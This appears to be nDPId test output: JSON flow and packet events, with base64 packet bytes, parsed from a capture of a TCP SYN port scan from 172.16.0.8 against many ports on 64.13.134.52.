-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1433,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060596,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":57294,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1433,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1423,"flow_packet_id":1,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060596,"pkt":"ACYLMQczACWzv5HuCABFAAAs89cAACoGKpusEAAIQA2GNIzT387dU4MZAAAAAGACDABMvQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1434,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1424,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060597,"flow_last_seen":1278275060597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060597,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1434,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1424,"flow_packet_id":1,"flow_last_seen":1278275060597,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060597,"pkt":"ACYLMQczACWzv5HuCABFAAAs1hEAADoGOGGsEAAIQA2GNIzTBQfdU4MZAAAAAGACDAAnhQAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1435,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060597,"flow_last_seen":1278275060597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060597,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1435,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1425,"flow_packet_id":1,"flow_last_seen":1278275060597,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060597,"pkt":"ACYLMQczACWzv5HuCABFAAAsoEYAADMGdSysEAAIQA2GNIzTABTdU4MZAAAAAGACEAAoeAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1436,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060598,"flow_last_seen":1278275060598,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060598,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1436,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1426,"flow_packet_id":1,"flow_last_seen":1278275060598,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060598,"pkt":"ACYLMQczACWzv5HuCABFAAAsPSsAACcG5EesEAAIQA2GNIzTPvHdU4MZAAAAAGACEADpmgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1437,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2557,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1437,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1427,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAs6VAAADkGJiKsEAAIQA2GNIzTCf3dU4MZAAAAAGACCAAmjwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1438,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1438,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1428,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAspgEAADUGbXGsEAAIQA2GNIzTDJXdU4MZAAAAAGACCAAj9wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1439,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":81,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1439,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1429,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAsExMAADIGA2CsEAAIQA2GNIzTAFHdU4MZAAAAAGACDAAsOwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1440,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3889,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1440,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1430,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAsn2EAACsGfhGsEAAIQA2GNIzSDzHdUoMYAAAAAGACEAAZXgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1441,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6565,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1441,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1431,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAs4qcAADsGKsusEAAIQA2GNIzSGaXdUoMYAAAAAGACEAAO6gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1442,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1442,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1432,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAsIwwAACcG\/masEAAIQA2GNIzSB9fdUoMYAAAAAGACEAAguAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1443,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1443,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1433,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAs8L8AADYGIbOsEAAIQA2GNIzSDMXdUoMYAAAAAGACDAAfygAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1444,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1444,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1434,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAstuoAADMGXoisEAAIQA2GNIzSA+jdUoMYAAAAAGACEAAkpwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1445,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2492,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1445,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1435,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAsXSkAADsGsEmsEAAIQA2GNIzSCbzdUoMYAAAAAGACEAAe0wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1446,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2710,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1446,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1436,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAsPRsAADsG0FesEAAIQA2GNIzSCpbdUoMYAAAAAGACEAAd+QAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1447,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060642,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1447,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1437,"flow_packet_id":1,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060642,"pkt":"ACYLMQczACWzv5HuCABFAAAsWbIAACUGycCsEAAIQA2GNIzSE4zdUoMYAAAAAGACCAAdAwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1448,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060642,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1448,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1438,"flow_packet_id":1,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060642,"pkt":"ACYLMQczACWzv5HuCABFAAAsW3wAADkGs\/asEAAIQA2GNIzSHRPdUoMYAAAAAGACCAATfAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1449,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060642,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1449,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1439,"flow_packet_id":1,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060642,"pkt":"ACYLMQczACWzv5HuCABFAAAsRWcAADIG0QusEAAIQA2GNIzSatjdUoMYAAAAAGACDADBtgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1450,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060642,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1450,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1440,"flow_packet_id":1,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060642,"pkt":"ACYLMQczACWzv5HuCABFAAAsMg8AACsG62OsEAAIQA2GNIzSG1zdUoMYAAAAAGACEAANMwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1451,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060642,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1451,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1441,"flow_packet_id":1,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060642,"pkt":"ACYLMQczACWzv5HuCABFAAAsul8AACgGZhOsEAAIQA2GNIzSzcHdUoMYAAAAAGACBABmzQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1452,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060642,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1452,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1442,"flow_packet_id":1,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060642,"pkt":"ACYLMQczACWzv5HuCABFAAAsl44AAC0Gg+SsEAAIQA2GNIzSH5HdUoMYAAAAAGACCAAQ\/gAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1453,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060642,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1453,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1443,"flow_packet_id":1,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060642,"pkt":"ACYLMQczACWzv5HuCABFAAAshnQAADQGjf6sEAAIQA2GNIzSwBfdUoMYAAAAAGACBAB0dwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1454,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060643,"flow_last_seen":1278275060643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060643,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1444,"flow_packet_id":1,"flow_last_seen":1278275060643,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060643,"pkt":"ACYLMQczACWzv5HuCABFAAAs1cMAADEGQa+sEAAIQA2GNIzTDPrdU4MZAAAAAGACCAAjkgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1455,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060644,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1455,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1445,"flow_packet_id":1,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060644,"pkt":"ACYLMQczACWzv5HuCABFAAAsdoQAACoGp+6sEAAIQA2GNIzTFqndU4MZAAAAAGACDAAV4wAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1456,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060644,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1456,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1446,"flow_packet_id":1,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060644,"pkt":"ACYLMQczACWzv5HuCABFAAAsFmcAAC4GBAysEAAIQA2GNIzTAA3dU4MZAAAAAGACDAAsfwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1457,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060644,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3871,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
